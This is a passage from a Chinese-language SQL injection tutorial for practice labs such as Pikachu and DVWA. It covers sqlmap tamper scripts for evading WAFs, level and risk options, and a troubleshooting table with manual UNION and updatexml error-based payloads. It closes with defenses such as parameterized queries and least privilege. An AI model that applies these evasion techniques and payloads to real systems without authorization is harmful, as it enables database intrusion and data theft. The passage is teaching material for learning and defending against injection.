--tamperspace2commentspace2comment脚本会把空格替换成/**/。between用between替换。charencode对Payload进行URL编码。randomcase随机大小写。你可以同时使用多个脚本--tamperspace2comment,charencode。高级选项python sqlmap.py -u http://target.com/vul.php?id1 --level3 --risk3--level测试等级1-5等级越高发送的测试Payload越多、越复杂。--risk风险等级1-3风险越高测试可能引发更多请求或对数据造成更新如使用OR条件的Payload。在实际面对一个可能存在防护的目标时一个典型的思路是先用手工方式简单探测判断是否存在过滤以及过滤了哪些关键词然后根据过滤情况选择合适的sqlmap tamper脚本组合进行自动化测试如果还不行可能需要自己编写或修改tamper脚本。7. 实战问题排查与深度思考即使按照教程操作你也可能会遇到各种问题。这里记录一些我踩过的坑和解决方法。7.1 常见问题速查表问题现象可能原因解决方案sqlmap检测不到注入点1. 目标真的没有SQL注入漏洞。2. 存在WAF/过滤默认Payload被拦截。3. 注入点类型特殊如Cookie、User-Agent头。4. 需要登录会话失效。1. 用手工方式仔细验证。2. 使用--tamper脚本或降低检测强度--level 1。3. 用-r加载抓包文件或指定参数-p “Cookie”。4. 提供有效的--cookie。手工注入时union select不显示回显1. 原查询结果不为空union的结果被覆盖。2. 页面有多个回显位需要尝试不同列。3. 不是联合查询注入可能是报错注入或盲注。1. 确保前一个SELECT结果为空id-1。2. 尝试union select null,null,null看哪个位置被输出。3. 尝试报错注入Payload如and updatexml(1,concat(0x7e,database()),1)。靶场页面报错或无法连接数据库1. 数据库服务未启动。2. 靶场源码的数据库配置文件有误。3. PHP版本不兼容。1. 检查XAMPP/PHPStudy中的MySQL服务状态。2. 检查pikachu目录下的inc/config.inc.php等配置文件确保数据库连接信息正确。3. 切换PHP版本到5.6或7.2。使用--dump时sqlmap卡住1. 数据量太大。2. 网络延迟或目标响应慢。3. 在枚举阶段遇到了问题。1. 使用--start和--stop参数分块获取如--dump --start 1 --stop 10。2. 增加超时时间--timeout30。3. 先单独执行--columns看看是否正常。7.2 从攻击者到防御者的思维转变当我们熟练掌握了注入技巧后更重要的是学会如何防御。这才是安全工作的核心价值。根本解决方案参数化查询预编译语句这是防止SQL注入最有效、最根本的方法。它的原理是将SQL语句的结构模板与数据参数分开发送给数据库。数据库先编译语句结构再将参数当作纯数据处理从根本上杜绝了参数被解释为代码的可能性。PHP (PDO):$stmt $pdo-prepare(SELECT * FROM users WHERE id :id AND username :name); $stmt-execute([id $id, name $name]); $results $stmt-fetchAll();Java (PreparedStatement):String sql SELECT * FROM users WHERE id ? AND username ?; PreparedStatement pstmt connection.prepareStatement(sql); pstmt.setInt(1, userId); pstmt.setString(2, userName); ResultSet rs pstmt.executeQuery();请在你的代码中永远使用这种方式来拼接SQL语句。纵深防御策略输入验证在业务逻辑层对输入数据的类型、长度、格式进行严格检查。例如id参数必须是整数就可以用intval()函数强制转换。最小权限原则为Web应用连接数据库的账户分配最小的必要权限。通常只赋予SELECT、INSERT、UPDATE、DELETE等操作权限绝不赋予DROP、FILE、EXECUTE等高风险权限。错误处理自定义错误页面避免将数据库的原始错误信息包含路径、SQL语句片段等直接展示给用户。WAF在应用层前部署WAF作为一道额外的防线可以拦截大量已知的攻击模式。手工注入训练了你的“攻击视角”让你能像黑客一样思考而理解防御则培养了你的“建设者视角”让你能构建更坚固的系统。两者结合才能让你在网络安全这条路上走得更远、更稳。在CTFHub的技能树里爬升或者在Pikachu、DVWA里通关都只是起点。真正的战场在于你是否能将这份对漏洞的深刻理解融入到日常开发和安全评估的每一个细节中去。
)
